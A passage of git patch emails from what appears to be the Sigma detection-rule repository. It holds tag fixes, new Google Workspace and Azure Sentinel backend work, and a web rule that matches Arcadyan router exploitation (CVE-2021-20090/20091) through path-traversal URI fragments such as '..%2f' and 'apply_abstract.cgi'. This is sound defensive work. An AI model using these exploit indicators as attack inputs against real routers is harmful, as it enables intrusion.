0560/1367] fix tags --- rules/windows/file_event/win_outlook_c2_macro_creation.yml | 2 +- .../win_office_spawn_exe_from_users_directory.yml | 2 +- rules/windows/process_creation/win_renamed_paexec.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/win_outlook_c2_macro_creation.yml b/rules/windows/file_event/win_outlook_c2_macro_creation.yml index e2b9f0c1..a7b44dbb 100644 --- a/rules/windows/file_event/win_outlook_c2_macro_creation.yml +++ b/rules/windows/file_event/win_outlook_c2_macro_creation.yml @@ -7,7 +7,7 @@ references: author: '@ScoubiMtl' tags: - attack.persistence - - command_and_control + - attack.command_and_control - attack.t1137 - attack.t1008 - attack.t1546 diff --git a/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml b/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml index cf43685f..fbb81445 100644 --- a/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml +++ b/rules/windows/process_creation/win_office_spawn_exe_from_users_directory.yml @@ -9,7 +9,7 @@ tags: - attack.execution - attack.t1204 # an old one - attack.t1204.002 - - FIN7 + - attack.g0046 - car.2013-05-002 author: Jason Lynch date: 2019/04/02 diff --git a/rules/windows/process_creation/win_renamed_paexec.yml b/rules/windows/process_creation/win_renamed_paexec.yml index b062debd..50de18b0 100644 --- a/rules/windows/process_creation/win_renamed_paexec.yml +++ b/rules/windows/process_creation/win_renamed_paexec.yml @@ -9,7 +9,7 @@ tags: - attack.defense_evasion - attack.t1036 # an old one - attack.t1036.003 - - FIN7 + - attack.g0046 - car.2013-05-009 date: 2019/04/17 modified: 2020/09/06 From cc519552aa7f7b282790062c85e3a422710852cb Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 14:54:07 +0200 Subject: [PATCH 0561/1367] refactor: RazorInstaller integrity level system --- .../win_susp_razorinstaller_explorer.yml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml index cffed858..1059d928 100644 --- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -5,8 +5,9 @@ description: Detects a explorer.exe sub process of the RazerInstaller software w references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji -author: Florian Roth +author: Florian Roth, Maxime Thiebaut date: 2021/08/23 +modified: 2021/08/24 tags: - attack.privilege_escalation logsource: @@ -14,9 +15,11 @@ logsource: product: windows detection: selection: - Image|endswith: '\explorer.exe' ParentImage|endswith: '\RazerInstaller.exe' - condition: selection + IntegrityLevel: 'System' + filter: + Image|beginswith: 'C:\Windows\Installer\Razer\Installer\' + condition: selection and not filter falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high \ No newline at end of file From 46e312ff0deba8b37ec058e02bd0b64abf50ef6c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Tue, 24 Aug 2021 15:03:23 +0200 Subject: [PATCH 0562/1367] fix: error in modifier --- .../process_creation/win_susp_razorinstaller_explorer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml index 1059d928..6f1b91d8 100644 --- a/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml +++ b/rules/windows/process_creation/win_susp_razorinstaller_explorer.yml @@ -18,7 +18,7 @@ detection: ParentImage|endswith: '\RazerInstaller.exe' IntegrityLevel: 'System' filter: - Image|beginswith: 'C:\Windows\Installer\Razer\Installer\' + Image|startswith: 'C:\Windows\Installer\Razer\Installer\' condition: selection and not filter falsepositives: - User selecting a different installation folder (check for other sub processes of this explorer.exe process) From 62f2affd032fff63e086fdeefc1634cb40a809e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 24 Aug 2021 14:15:50 +0000 Subject: [PATCH 0563/1367] Spelling fix --- CHANGELOG.md | 2 +- rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml | 2 +- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index ece949b9..23cb0186 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -23,7 +23,7 @@ from version 0.14.0. * Elastic EQL backend * Additional conversion selection filters * Filter negation -* Specifiy table in SQL backend +* Specify table in SQL backend * Generic registry event log source * Chronicle backend diff --git a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml index e1602e38..0b09904b 100644 --- a/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml +++ b/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml @@ -17,7 +17,7 @@ detection: level: medium tags: - attack.persistence - - atack.t1098 + - attack.t1098 falsepositives: - Unknown diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 55d1b405..b71a4344 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -17,7 +17,7 @@ detection: status: success condition: selection falsepositives: - - Unkown + - Unknown level: medium tags: - attack.initial_access From ce6141e3187e20bd39e3b412e353767bad99df6f Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Tue, 24 Aug 2021 21:11:46 +0545 Subject: [PATCH 0564/1367] Added rule for Arcadyan Router Exploitations --- ...uter_cve_2021_20090_2021_20091_exploit.yml | 58 +++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml new file mode 100644 index 00000000..7cda3b67 --- /dev/null +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -0,0 +1,58 @@ +action: global +title: Arcadyan Router Exploitations +id: f0500377-bc70-425d-ac8c-e956cd906871 +status: experimental +description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. +references: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + - https://www.tenable.com/security/research/tra-2021-13 + - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild +author: Bhabesh Raj +date: 2021/08/24 +falsepositives: + - Unknown +level: critical +tags: + - attack.initial_access + - attack.t1190 + - cve.2021-20090 + - cve.2021-20091 +--- +logsource: # CVE-2021-20090 (Path Traversal) + category: webserver +detection: + path_traversal: + c-uri|contains: + - '..%2f' + noauth_list: + c-uri|contains: + - '/images/' + - '/js/' + - '/css/' + - '/setup_top_login.htm' + - '/login.html' + - '/loginerror.html' + - '/loginexclude.html' + - '/loginlock.html' + condition: path_traversal and noauth_list +--- +logsource: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection) + category: webserver +detection: + path_traversal: + c-uri|contains|all: + - '..%2f' + - 'apply_abstract.cgi' + noauth_list: + c-uri|contains: + - '/images/' + - '/js/' + - '/css/' + - '/setup_top_login.htm' + - '/login.html' + - '/loginerror.html' + - '/loginexclude.html' + - '/loginlock.html' + condition: path_traversal and noauth_list \ No newline at end of file From ab8cc52dc6fde1b40cd7d5552d389738192fd78c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Tue, 24 Aug 2021 10:53:59 -0500 Subject: [PATCH 0565/1367] Role-Based Rules --- .../gworkspace_role_modified_or_deleted.yml | 25 +++++++++++++++++++ .../gworkspace_role_privilege_deleted.yml | 22 ++++++++++++++++ 2 files changed, 47 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml create mode 100644 rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml diff --git a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml new file mode 100644 index 00000000..9437ca57 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Workspace Role Modified or Deleted +id: 6aef64e3-60c6-4782-8db3-8448759c714e +description: Detects when an a role is modified or deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - DELETE_ROLE + - RENAME_ROLE + - UPDATE_ROLE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown + \ No newline at end of file diff --git a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml new file mode 100644 index 00000000..f130b35e --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml @@ -0,0 +1,22 @@ +title: Google Workspace Role Privilege Deleted +id: bf638ef7-4d2d-44bb-a1dc-a238252e6267 +description: Detects when an a role privilege is deleted in Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/24 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: REMOVE_PRIVILEGE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown + \ No newline at end of file From a5f858b63c283abd96e90990bb4befecf3ce2e3a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 21:13:49 +0200 Subject: [PATCH 0566/1367] update references --- .../cloud/gworkspace/gworkspace_role_modified_or_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml index 9437ca57..e0bab12f 100644 --- a/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml +++ b/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/08/24 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings logsource: service: google_workspace.admin detection: @@ -22,4 +22,4 @@ tags: - attack.impact falsepositives: - Unknown - \ No newline at end of file + From 09a00232fb70cc1e0c0107dcdde34ec023fb51ec Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 24 Aug 2021 21:14:59 +0200 Subject: [PATCH 0567/1367] update references --- rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml index f130b35e..7a803146 100644 --- a/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml +++ b/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/08/24 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 - - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings logsource: service: google_workspace.admin detection: @@ -19,4 +19,4 @@ tags: - attack.impact falsepositives: - Unknown - \ No newline at end of file + From 93be8471ecb45978d98ba621f1a80c27ca686068 Mon Sep 17 00:00:00 2001 From: Joshua Roys Date: Tue, 24 Aug 2021 15:58:21 -0400 Subject: [PATCH 0568/1367] Fix tactics/techniques in ALA backend --- tools/sigma/backends/ala.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index c053004e..73683157 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -361,6 +361,8 @@ class AzureAPIBackend(AzureLogAnalyticsBackend): for technique in self.techniques: if key_id == technique.get("technique_id", ""): yield technique + if "." in key_id and key_id.split(".")[0] == technique.get("technique_id", ""): + yield technique def _load_mitre_file(self, mitre_type): try: @@ -383,7 +385,10 @@ class AzureAPIBackend(AzureLogAnalyticsBackend): local_storage_techniques = {item["technique_id"]: item for item in self.find_technique(src_technics)} for key_id in src_technics: - src_tactic = local_storage_techniques.get(key_id, {}).get("tactic") + if "." in key_id: + src_tactic = local_storage_techniques.get(key_id.split(".")[0], {}).get("tactic") + else: + src_tactic = local_storage_techniques.get(key_id, {}).get("tactic") if not src_tactic: continue src_tactic = set(src_tactic) From 829117ca7fb92923730bec711e9f4a1cd965fd98 Mon Sep 17 00:00:00 2001 From: Joshua Roys Date: Tue, 24 Aug 2021 16:00:08 -0400 Subject: [PATCH 0569/1367] Allow ints as values in ALA backend Without this, LogonType set as an int caused sigmac to abort the rule. --- tools/sigma/backends/ala.py | 2 ++ tools/sigma/backends/mixins.py | 2 ++ 2 files changed, 4 insertions(+) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index 73683157..cc281039 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -106,6 +106,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): return parse_arg def default_value_mapping(self, val): + if isinstance(val, int): + return "== %d" % (val) op = "==" if isinstance(val, str): if "*" in val[1:-1]: # value contains * inside string - use regex match diff --git a/tools/sigma/backends/mixins.py b/tools/sigma/backends/mixins.py index a835be99..ecdddca7 100644 --- a/tools/sigma/backends/mixins.py +++ b/tools/sigma/backends/mixins.py @@ -27,6 +27,8 @@ class QuoteCharMixin: reClear = None # match characters that are cleaned out completely def cleanValue(self, val): + if type(val) == int: + return val if self.reEscape: val = self.reEscape.sub(self.escapeSubst, val) if self.reClear: From 294bb432d0f2cb9b915247ddea47c8a7d51d2e0a Mon Sep 17 00:00:00 2001 From: Joshua Roys Date: Tue, 24 Aug 2021 16:01:23 -0400 Subject: [PATCH 0570/1367] Add Azure Sentinel backend The web interface expects ARM templates. --- tools/config/ala.yml | 1 + tools/sigma/backends/ala.py | 97 +++++++++++++++++++++++++++++++++++-- 2 files changed, 95 insertions(+), 3 deletions(-) diff --git a/tools/config/ala.yml b/tools/config/ala.yml index 1f4dd8ff..e9110fc7 100644 --- a/tools/config/ala.yml +++ b/tools/config/ala.yml @@ -3,6 +3,7 @@ order: 20 backends: - ala - ala-rule + - sentinel-rule fieldmappings: ComputerName: Computer Event-ID: EventID diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index cc281039..ef90618c 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -19,6 +19,8 @@ import re import json import xml.etree.ElementTree as xml +from datetime import timedelta +from uuid import uuid4 from sigma.config.mapping import ( SimpleFieldMapping, MultiFieldMapping, ConditionalFieldMapping @@ -423,6 +425,28 @@ class AzureAPIBackend(AzureLogAnalyticsBackend): return tactics, technics + def timeframeToDelta(self, timeframe): + time_unit = timeframe[-1:] + duration = int(timeframe[:-1]) + return ( + time_unit == "s" and timedelta(seconds=duration) or + time_unit == "m" and timedelta(minutes=duration) or + time_unit == "h" and timedelta(hours=duration) or + time_unit == "d" and timedelta(days=duration) or + None + ) + + def iso8601_duration(self, delta): + if not delta: + return "PT0S" + if not delta.seconds: + return "P%dD" % (delta.days) + days = delta.days and "%dD" % (delta.days) or "" + hours = delta.seconds // 3600 % 24 and "%dH" % (delta.seconds // 3600 % 24) or "" + minutes = delta.seconds // 60 % 60 and "%dM" % (delta.seconds // 60 % 60) or "" + seconds = delta.seconds % 60 and "%dS" % (delta.seconds % 60) or "" + return "P%sT%s%s%s" % (days, hours, minutes, seconds) + def create_rule(self, config): tags = config.get("tags", []) @@ -430,17 +454,21 @@ class AzureAPIBackend(AzureLogAnalyticsBackend): tactics, technics = self.skip_tactics_or_techniques(technics, tactics) tactics = list(map(lambda s: s.replace(" ", ""), tactics)) + timeframe = self.timeframeToDelta(config["detection"].setdefault("timeframe", "30m")) + queryDuration = self.iso8601_duration(timeframe) + suppressionDuration = self.iso8601_duration(timeframe * 5) + rule = { "displayName": "{} by {}".format(config.get("title"), config.get('author')), "description": "{} {}".format(config.get("description"), "Technique: {}.".format(",".join(technics))), "severity": self.parse_severity(config.get("level", "medium")), "enabled": True, "query": config.get("translation"), - "queryFrequency": "12H", - "queryPeriod": "12H", + "queryFrequency": queryDuration, + "queryPeriod": queryDuration, "triggerOperator": "GreaterThan", "triggerThreshold": 0, - "suppressionDuration": "12H", + "suppressionDuration": suppressionDuration, "suppressionEnabled": True, "tactics": tactics } @@ -455,3 +483,66 @@ class AzureAPIBackend(AzureLogAnalyticsBackend): return rule else: raise NotSupportedError("No table could be determined from Sigma rule") + +class SentinelBackend(AzureAPIBackend): + """Converts Sigma rule into Azure Sentinel scheduled alert rule ARM template.""" + identifier = "sentinel-rule" + active = True + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def generate(self, sigmaparser): + translation = super().generate(sigmaparser) + if translation: + configs = sigmaparser.parsedyaml + configs.update({"translation": translation}) + rule = self.create_sentinel_rule(configs) + return json.dumps(rule) + + def create_sentinel_rule(self, config): + # https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/child-resource-name-type#outside-parent-resource + # https://docs.microsoft.com/en-us/azure/templates/microsoft.operationalinsights/workspaces?tabs=json + # https://docs.microsoft.com/en-us/rest/api/securityinsights/alert-rules/create-or-update#scheduledalertrule + properties = json.loads(config.get("translation")) + properties.update({ + "incidentConfiguration": { + "createIncident": True, + "groupingConfiguration": { + "enabled": False, + "reopenClosedIncident": False, + "lookbackDuration": properties['suppressionDuration'], + "matchingMethod": "AllEntities", + "groupByEntities": [], + "groupByAlertDetails": [], + "groupByCustomDetails": [], + }, + }, + "eventGroupingSettings": { + "aggregationKind": "SingleAlert", + }, + "alertDetailsOverride": None, + "customDetails": None, + "templateVersion": "1.0.0", + }) + rule_uuid = config.get("id", str(uuid4())) + return { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "workspace": { + "type": "String", + }, + }, + "resources": [ + { + "id": "[concat(resourceId('Microsoft.OperationalInsights/workspaces/providers', parameters('workspace'), 'Microsoft.SecurityInsights'),'/alertRules/" + rule_uuid + "')]", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/" + rule_uuid + "')]", + "type": "Microsoft.OperationalInsights/workspaces/providers/alertRules", + "apiVersion": "2021-03-01-preview", + + "kind": "Scheduled", + "properties": properties, + }, + ], + } From c1154e7b454c1a3f1a76c164f8244a0a81afda24 Mon Sep 17 00:00:00 2001 From: Young Date: Tue, 24 Aug 2021 16:24:45 -0700 Subject: [PATCH 0571/1367] removed osMonitor.json --- .DS_Store | Bin 8196 -> 8196 bytes tools/.DS_Store | Bin 6148 -> 6148 bytes tools/osMonitor.json | 1 - 3 files changed, 1 deletion(-) delete mode 100644 tools/osMonitor.json diff --git a/.DS_Store b/.DS_Store index b70b452d0071309beb8e844f281cb3104d236e61..ec1c03f419ae50d6a9f11096836056b8ba0ed345 100644 GIT binary patch delta 67 wcmZp1XmQwJCn{oOVyUBGVs2Keqfl*WXsn}PYGOKhyO8$Vn7kkoc!dZ boctsP1_l8jb_C*io0V8sGHqt(_{$Ff=H3!# diff --git a/tools/osMonitor.json b/tools/osMonitor.json deleted file mode 100644 index 1bc384ef..00000000 --- a/tools/osMonitor.json +++ /dev/null @@ -1 +0,0 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.channel": "\"Security\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"5156\""}}]}}, {"bool": {"should": [{"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.SourcePort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.DestAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.DestAddress.keyword": "\\:\\:1"}}]}}]}}, {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.DestPort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.SourceAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.SourceAddress.keyword": "\\:\\:1"}}]}}]}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} From a4d0e3453d5a72ef39850089ab204fe17badc694 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 25 Aug 2021 10:24:15 +0545 Subject: [PATCH 0572/1367] Fix for CVE tag --- ...b_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml index 7cda3b67..a816bc22 100644 --- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -4,21 +4,20 @@ id: f0500377-bc70-425d-ac8c-e956cd906871 status: experimental description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091 + - https://nvd.nist.gov/vuln/detail/cve-2021-20090 + - https://nvd.nist.gov/vuln/detail/cve-2021-20091 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://www.tenable.com/security/research/tra-2021-13 - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild author: Bhabesh Raj date: 2021/08/24 +modified: 2021/08/25 falsepositives: - Unknown level: critical tags: - attack.initial_access - attack.t1190 - - cve.2021-20090 - - cve.2021-20091 --- logsource: # CVE-2021-20090 (Path Traversal) category: webserver From df4180547ef43e43820f5277cc5a750f4b548e25 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 25 Aug 2021 11:18:51 +0545 Subject: [PATCH 0573/1367] Merged rules --- ...uter_cve_2021_20090_2021_20091_exploit.yml | 27 ++++--------------- 1 file changed, 5 insertions(+), 22 deletions(-) diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml index a816bc22..06718546 100644 --- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -1,4 +1,3 @@ -action: global title: Arcadyan Router Exploitations id: f0500377-bc70-425d-ac8c-e956cd906871 status: experimental @@ -18,30 +17,14 @@ level: critical tags: - attack.initial_access - attack.t1190 ---- -logsource: # CVE-2021-20090 (Path Traversal) +logsource: category: webserver detection: path_traversal: - c-uri|contains: + c-uri|contains: # CVE-2021-20090 (Bypass Auth: Path Traversal) - '..%2f' - noauth_list: - c-uri|contains: - - '/images/' - - '/js/' - - '/css/' - - '/setup_top_login.htm' - - '/login.html' - - '/loginerror.html' - - '/loginexclude.html' - - '/loginlock.html' - condition: path_traversal and noauth_list ---- -logsource: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection) - category: webserver -detection: - path_traversal: - c-uri|contains|all: + config_file_inj: + c-uri|contains|all: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection) - '..%2f' - 'apply_abstract.cgi' noauth_list: @@ -54,4 +37,4 @@ detection: - '/loginerror.html' - '/loginexclude.html' - '/loginlock.html' - condition: path_traversal and noauth_list \ No newline at end of file + condition: (path_traversal or config_file_inj) and noauth_list \ No newline at end of file From 1d725e8519247d7bda21d6c02d826c9533cca11e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 25 Aug 2021 08:15:18 +0200 Subject: [PATCH 0574/1367] add gworkspace_user_granted_admin_privileges.yml --- ...orkspace_user_granted_admin_privileges.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 00000000..ffc061d0 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,24 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an Google Workspace user is granted admin privileges. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. \ No newline at end of file From a4021842de4aeecbf2dea05cf8154280da921a31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 25 Aug 2021 09:15:57 +0200 Subject: [PATCH 0575/1367] Fix invalid tags --- rules/compliance/cleartext_protocols.yml | 86 +++++++++---------- .../compliance/default_credentials_usage.yml | 52 +++++------ .../compliance/group_modification_logging.yml | 52 +++++------ rules/compliance/host_without_firewall.yml | 24 +++--- rules/compliance/workstation_was_locked.yml | 48 +++++------ .../process_creation/win_apt_unc2452_cmds.yml | 4 +- .../process_creation/win_apt_unc2452_ps.yml | 2 +- ...susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../sysmon_susp_reg_persist_explorer_run.yml | 2 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 2 +- tests/test_rules.py | 22 ++--- 11 files changed, 148 insertions(+), 148 deletions(-) diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/cleartext_protocols.yml index eb1acd9c..40905d70 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/cleartext_protocols.yml @@ -13,49 +13,49 @@ references: falsepositives: - unknown level: low -tags: - - CSC4 - - CSC4.5 - - CSC14 - - CSC14.4 - - CSC16 - - CSC16.5 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - NIST CSF 1.1 PR.AC-1 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AC-5 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 PR.DS-1 - - NIST CSF 1.1 PR.DS-2 - - ISO 27002-2013 A.9.2.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - ISO 27002-2013 A.8.3.1 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.10.1.1 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 